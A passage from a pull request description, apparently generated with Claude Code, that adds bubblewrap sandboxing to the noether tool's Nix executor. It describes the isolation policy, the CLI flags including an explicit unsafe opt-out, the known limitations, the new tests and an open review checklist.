  network namespace; all others can't reach out at all.
- All Linux capabilities dropped (`--cap-drop ALL`).
- Environment cleared; only an allowlist passes through (`PATH`,
  `HOME`, `NIX_PATH`, `NIX_SSL_CERT_FILE`, locale vars).
- `--die-with-parent` so the sandbox reaps on `noether` exit.

### CLI surface

```bash
noether run --isolate=auto graph.json     # default: bwrap if available
noether run --isolate=bwrap graph.json    # require bwrap; fail if missing
noether run --isolate=none --unsafe-no-isolation graph.json   # opt-out
```

Env fallback: `NOETHER_ISOLATION=auto|bwrap|none`.

Without `--unsafe-no-isolation`, `--isolate=none` emits a loud
warning. Without `bwrap` installed, `--isolate=auto` falls back to
`none` with the same warning and a "install bubblewrap to enable
sandboxing" hint.

### What Phase 1 does NOT do

- **Native namespaces + Landlock + seccomp** — Phase 2, v0.8. Same
  policy, ~10× lower startup, no external binary.
- **cgroup-based resource limits** (memory caps, fork-bomb
  protection). Follow-up.
- **macOS / Windows** — bwrap is Linux-only. `--isolate=auto` on
  those platforms falls back to `none` with a platform-warning.
- **Per-URL network allowlisting** — a stage with `Effect::Network`
  can still call any URL. Network-allowlist is a v0.9+ item.

### Implementation

- `crates/noether-engine/src/executor/isolation.rs` (new module):
  - `IsolationBackend` enum (`None`, `Bwrap`)
  - `IsolationPolicy` with `from_effects` derivation
  - `build_bwrap_command` renders the policy into a `Command`
  - `find_bwrap` walks `$PATH`
- `NixConfig::isolation` field + `NixConfig::with_isolation` setter
- `NixExecutor::run_script` wraps its subprocess in bwrap when the
  backend isn't `None`. Bind-mounts the Nix binary's parent dir
  read-only so the sandboxed child can invoke it.
- `CompositeExecutor::with_isolation` threads the choice through
  the executor stack.
- `noether run` wires `--isolate` / `NOETHER_ISOLATION` into the
  executor builder.
- `SECURITY.md` updated with the new trust model.

### Tests (7 new, all passing)

- `from_flag_parses_known_values` — flag parser accepts
  auto/bwrap/none, rejects unknown.
- `policy_without_network_effect_isolates_network` — pure stages get
  `network: false`.
- `policy_with_network_effect_shares_network` — Network effect sets
  `network: true`.
- `policy_always_binds_nix_store` — `/nix/store` always in ro_binds.
- `bwrap_command_includes_core_flags` — `--unshare-all`, `--clearenv`,
  `--cap-drop ALL`, `--die-with-parent` all present.
- `bwrap_command_adds_share_net_for_network_effect` — correct flag
  toggling.
- `effectiveness_predicate_matches_variant` — `is_effective()`
  distinguishes `None` from `Bwrap`.

### Stacked on

`main` (post-v0.6.0).

## Test plan

- [x] `cargo test --workspace` green
- [x] `cargo clippy --all-targets --all-features -- -D warnings` clean
- [x] `cargo fmt --check` clean
- [x] `noether run --help` shows `--isolate` + `--unsafe-no-isolation`
- [x] `noether run --isolate=none --unsafe-no-isolation` parses
      without warning
- [ ] Review: policy derivation from `EffectSet` — are there effects
      we should surface differently? (e.g., `Effect::FsWrite` →
      additional bind-mount into the sandbox?)
- [ ] Review: the env-var allowlist — anything missing or too
      permissive?
- [ ] Review: is bubblewrap the right Phase-1 choice, or jump
      straight to native namespaces?

🤖 Generated with [Claude Code](https://claude.com/claude-code)
